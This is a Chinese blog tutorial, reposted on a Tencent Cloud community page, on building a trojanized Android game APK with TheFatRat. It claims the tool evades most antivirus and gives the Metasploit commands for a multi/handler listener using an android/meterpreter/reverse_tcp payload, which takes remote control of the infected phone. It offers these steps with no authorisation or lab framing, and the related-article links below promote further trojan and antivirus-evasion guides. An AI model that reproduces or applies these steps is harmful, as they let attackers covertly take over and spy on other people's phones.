专栏首页黑客网络技术如何使用Kali生成木马入侵安卓手机

如何使用Kali生成木马入侵安卓手机

TheFatRat是一个大规模的开发工具、也是功能非常强大的自动化渗透工具。

版本阶段构建一个简单的工具来生成后门和简单的工具来张贴攻击攻击,如浏览器攻击,DLL。该工具使用流行的有效负载编译恶意软件,然后编译后的恶意软件可以在windows,android,mac上执行。使用此工具创建的恶意软件也有能力绕过大多数AV软件保护。TheFatRat安装好后如下图所示

在这里我们选择第五个、意思是生成一个apk的后门,就是android的app。如图

点击回车后

我们开始配置我们的本地IP地址,和监听的端口。以及放置游戏apk文件的地址,如图所示。

设置好本地IP地址,和监听的端口。以及放置游戏apk文件的地址,如上图出现1-6选项,我们选择3生成一个tcp的反弹链接。

然后选择2配置生成后门,我们可以看到已经有后门程序的总览。如图所示

然后在这里选择y ,下一步输入配置文件的名字(可以随便起一个)如图所示

这样木马就生成了,在home/Thefatrat/backdoored目录下

启动msf,配置监听模块,反弹链接,攻击机IP地址,监听端口,执行攻击exploit。如图所示

在kali的命令行中输入msfconsole 来启动msf 启动后如图

配置监听模块,反弹链接,攻击机IP地址,监听端口,执行攻击exploit,

命令如下

use exploit/multi/handler //加载模块

set payload android/meterpreter/reverse_tcp //设置一个安卓tcp反弹

set LHOST IP // 设置攻击者的IP地址

exploit //监听与攻击

如图

本文分享自微信公众号 - 黑客网络技术(Hacker202101),作者:Mr wang

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-12-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 黑客入侵你手机的方法不止两种哦

    太简单了。。。什么复制SIM卡,信号拦截,间谍卫星就不谈了,一般人黑客也犯不上用。

    知识与交流
  • Kali利用Android木马渗透手机(高级篇)

    选择网关 add to target 1 选择目标 add to target 2

    院长技术
  • 如何通过命令入侵安卓手机

    首先,我用的靶机是魅蓝2,对其网络使用静态ip:xxx.xxx.xxx.aaa,“x”是需要对应入侵机的ip,“a”则是没用过的0-255随便输

    知识与交流
  • 窃听电话的Hacking Team RCSAndroid木马

    安卓设备小心:4.0-4.3版本都可以被RCSAndroid 搞定。 安卓平台上的远程控制木马RCSAndroid是目前曝光的安卓中最专业、最复杂的恶意程序之一...

    FB客服
  • Kali之安卓木马

    Kali linux的安卓木马一般只能在内网操作,要想在监控互联网的安卓手机,必须要使用内网穿透,工具有很多,我使用的是NATAPP。思路如下:

    知识与交流
  • 从 “ 短信劫持马 ” 来谈APP安全

    这种短信劫持木马的概念和新闻我想大家都应该接触过了,就不怎么说概念了,具体的可以搜一搜新闻,一抓一大把。

    网e渗透安全部
  • 【XSS漏洞】通过XSS实现网页挂马

    前面也写了两期XSS相关的内容,今天就来点高大上的(并不是!),我们来通过XSS实现网页挂马~

    一名白帽的成长史
  • 报告:黑客可借漏洞攻击手机银行客户端

    安卓系统安全问题一直以来被业界所诟病。近日有安全报告指出,安卓手机系统漏洞严重威胁网民支付安全。利用安卓系统漏洞,黑客可以对手机银行客户端实施注...

    安恒信息
  • 利用frp搭建公网Metasploit并使用Shellter实现简单木马免杀

    免责声明:本公众号安全类、工具类文章仅用于安全学习、安全研究、技术交流,内容来源于互联网已公开内容,若读者利用此文所提供的信息而造成的任何直接或间接的后果和损失...

    yuanfan2012
  • 从挖矿木马看后渗透维权

    由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和...

    安恒网络空间安全讲武堂
  • Linux 应急响应流程及实战演练

    当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵...

    信安之路
  • 【实战】如何利用 Kali Linux 黑掉 Windows

    引言 Kali Linux是一个派生自 Debian Linux且主要用于渗透测试的系统,目前已经拥有超过300个的预装测试工具。 Metasploit 是...

    小小科
  • 利用venom之免杀木马花样上线

    洛米唯熊
  • 记一次糟心的内网靶场实战

    菜鸡又来发表文章了,一开始的时候对整个内网的拓扑结构还不熟,所以做的时候很乱,写的也很乱。有很多方法都没有想到去用。qaq大佬们多多指教。

    7089bAt@PowerLi
  • Android木马如何实现用户定位技术?

    这几年安卓系统的普及速度可谓迅猛,一时间各式各样的设备都承载着安卓系统,手机、平板、机顶盒等都忠实地成为了安卓系统的用户。由于安卓系统在移动设备上的使用率最高,...

    FB客服
  • 2014前网民有必要知道的十大网络威胁(上)

    有幸度过了2012年的世界末日,2013年的网络安全领域依旧波澜壮阔,除了“传统”的木马病毒,伪基站、GSM短信监听、路由器劫持等新兴威胁也开始显现。根据过去一...

    安恒信息
  • 黑客笔记 10年经验分享 ,安全渗透技术开放下载

    作为拥有着10年经验的渗透安全测试工程师,一路也是从小白历经磨难成长起来的我,给现在的新手小白一些建议。渗透安全的范围其实要学习的东西很广泛的,比如系统...

    Khan安全团队
  • 福利时刻 | 十年黑客大佬的Web安全渗透技术分享

    作为拥有着10年经验的渗透安全测试工程师,一路也是从小白历经磨难成长起来的我,给现在的新手小白一些建议。渗透安全的范围其实要学习的东西很广泛的,比如系统...

    辞令
  • 如何攻击同一局域网的其他设备

    2、在 Kali 终端输入以下命令在 Kali 虚拟机/root路径下生成远控文件520.apk:

    知识与交流

扫码关注云+社区

领取腾讯云代金券